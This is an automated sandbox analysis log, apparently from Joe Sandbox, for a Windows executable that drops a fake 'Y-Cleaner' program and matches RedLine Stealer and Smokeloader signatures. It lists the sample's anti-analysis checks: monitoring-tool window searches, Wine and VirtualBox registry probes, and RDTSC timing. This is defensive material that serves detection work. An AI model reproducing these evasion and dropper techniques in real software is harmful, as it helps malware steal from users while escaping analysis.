Source: 3K6rBUOQ2z.exeStatic PE information: section name: .idata
Source: 3K6rBUOQ2z.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CF7CAA0_3_04CF7CAA
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CE9D600_3_04CE9D60
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CEC7DD0_3_04CEC7DD
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CF37F90_3_04CF37F9
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CF97F20_3_04CF97F2
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CEE7200_3_04CEE720
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CF30E60_3_04CF30E6
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CE20700_3_04CE2070
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CF99120_3_04CF9912
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CECA0F0_3_04CECA0F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00402C700_2_00402C70
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_004188AA0_2_004188AA
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0040A9600_2_0040A960
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0040F3200_2_0040F320
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0040D3DD0_2_0040D3DD
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0041A3F20_2_0041A3F2
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_004143F90_2_004143F9
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00413CE60_2_00413CE6
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0041A5120_2_0041A512
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0040D60F0_2_0040D60F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_1000E1840_2_1000E184
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_100102A00_2_100102A0
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_008B4A810_2_008B4A81
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_008C4C930_2_008C4C93
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00848CBD0_2_00848CBD
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0081C8B80_2_0081C8B8
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_009852F90_2_009852F9
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_009802F40_2_009802F4
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_008A44010_2_008A4401
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0097BC090_2_0097BC09
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00831E5F0_2_00831E5F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_008784620_2_00878462
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0095567F0_2_0095567F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00988C600_2_00988C60
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_009828610_2_00982861
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0081DF880_2_0081DF88
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0098A3DE0_2_0098A3DE
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00882FD70_2_00882FD7
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0087BFE40_2_0087BFE4
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00837BE50_2_00837BE5
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_008DD50F0_2_008DD50F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_008421000_2_00842100
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00856F450_2_00856F45
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_008E054A0_2_008E054A
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0085BF6A0_2_0085BF6A
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B4F5870_2_04B4F587
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B5A6590_2_04B5A659
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B4D6440_2_04B4D644
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B5A7790_2_04B5A779
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B53F4D0_2_04B53F4D
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B4D8760_2_04B4D876
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B4ABC70_2_04B4ABC7
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B43B270_2_04B43B27
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: String function: 04B49E07 appears 35 times
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: String function: 04CE8FA0 appears 35 times
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: String function: 00409BA0 appears 35 times
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 1548
Source: 3K6rBUOQ2z.exe, 00000000.00000003.2379537572.0000000005FC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameY-Cleaner.exe4 vs 3K6rBUOQ2z.exe
Source: 3K6rBUOQ2z.exe, 00000000.00000003.2380142321.00000000057A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs 3K6rBUOQ2z.exe
Source: 3K6rBUOQ2z.exe, 00000000.00000003.2379411619.0000000005789000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs 3K6rBUOQ2z.exe
Source: 3K6rBUOQ2z.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2703351422.0000000000F89000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Y-Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 3K6rBUOQ2z.exeStatic PE information: Section: gvkzzqfv ZLIB complexity 0.9899259259259259
Source: classification engineClassification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402950
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00F8A45E CreateToolhelp32Snapshot,Module32First,0_2_00F8A45E
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401880
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4204
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile created: C:\Users\user~1\AppData\Local\Temp\wuBeweeRzJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCommand line argument: emp0_2_00408020
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCommand line argument: mixtwo0_2_00408020
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 3K6rBUOQ2z.exeReversingLabs: Detection: 31%
Source: 3K6rBUOQ2z.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\3K6rBUOQ2z.exe "C:\Users\user\Desktop\3K6rBUOQ2z.exe"
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 1548
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\wuBeweeRz\Y-Cleaner.exe
Source: 3K6rBUOQ2z.exeStatic file information: File size 1922560 > 1048576
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: 3K6rBUOQ2z.exeStatic PE information: Raw size of gvkzzqfv is bigger than: 0x100000 < 0x1a5e00

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeUnpacked PE file: 0.2.3K6rBUOQ2z.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gvkzzqfv:EW;qtkkvrkg:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: dll[1].0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: 3K6rBUOQ2z.exeStatic PE information: real checksum: 0x1deeef should be: 0x1dcc47
Source: Y-Cleaner.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: 3K6rBUOQ2z.exeStatic PE information: section name:
Source: 3K6rBUOQ2z.exeStatic PE information: section name: .idata
Source: 3K6rBUOQ2z.exeStatic PE information: section name:
Source: 3K6rBUOQ2z.exeStatic PE information: section name: gvkzzqfv
Source: 3K6rBUOQ2z.exeStatic PE information: section name: qtkkvrkg
Source: 3K6rBUOQ2z.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CFE2B5 push esi; ret 0_3_04CFE2BE
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04D02B88 push ss; ret 0_3_04D02B89
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0041FAB5 push esi; ret 0_2_0041FABE
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00424388 push ss; ret 0_2_00424389
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9A8A9 push edi; ret 0_2_00A9A8B8
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9B0A2 push ecx; ret 0_2_00A9B0B1
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00AA00A5 push dword ptr [ebx-17h]; retf 0_2_00AA0044
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00AA248E push ecx; iretd 0_2_00AA248F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9AC83 push esi; ret 0_2_00A9AC92
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00AA14F3 push 00000072h; iretd 0_2_00AA14F8
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9A8CC push ebp; ret 0_2_00A9A8DB
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9FCDD push ecx; mov dword ptr [esp], edi0_2_00A9FD4A
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9FCDD push edx; mov dword ptr [esp], 57DFDC56h0_2_00A9FD68
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9FCDD push edi; mov dword ptr [esp], ebp0_2_00A9FE78
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9ACDE push edi; ret 0_2_00A9ACED
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9DC2E push edx; mov dword ptr [esp], 7FFDE4A2h0_2_00A9DC6F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9DC2E push 2029F3A2h; mov dword ptr [esp], edx0_2_00A9DD5F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00AA1420 push ebx; ret 0_2_00AA1425
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9A833 push ecx; ret 0_2_00A9A842
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9AC36 push edi; ret 0_2_00A9AC45
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9DC0B push edx; mov dword ptr [esp], 7FFDE4A2h0_2_00A9DC6F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9DC0B push 2029F3A2h; mov dword ptr [esp], edx0_2_00A9DD5F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9AC01 push edx; ret 0_2_00A9AC10
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9E01C push 5B4F9D67h; mov dword ptr [esp], ecx0_2_00A9E0DB
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9DC64 push edx; mov dword ptr [esp], 7FFDE4A2h0_2_00A9DC6F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9DC64 push 2029F3A2h; mov dword ptr [esp], edx0_2_00A9DD5F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9B07B push ecx; ret 0_2_00A9B0B1
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9A877 push ebp; ret 0_2_00A9A886
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9DC50 push edx; mov dword ptr [esp], 7FFDE4A2h0_2_00A9DC6F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9DC50 push 2029F3A2h; mov dword ptr [esp], edx0_2_00A9DD5F
Source: 3K6rBUOQ2z.exeStatic PE information: section name: gvkzzqfv entropy: 7.94777914547085
Source: Y-Cleaner.exe.0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile created: C:\Users\user\AppData\Local\Temp\wuBeweeRz\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile created: C:\Users\user\AppData\Local\Temp\wuBeweeRz\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 81CF1A second address: 81CF1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 81CF1E second address: 81CF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
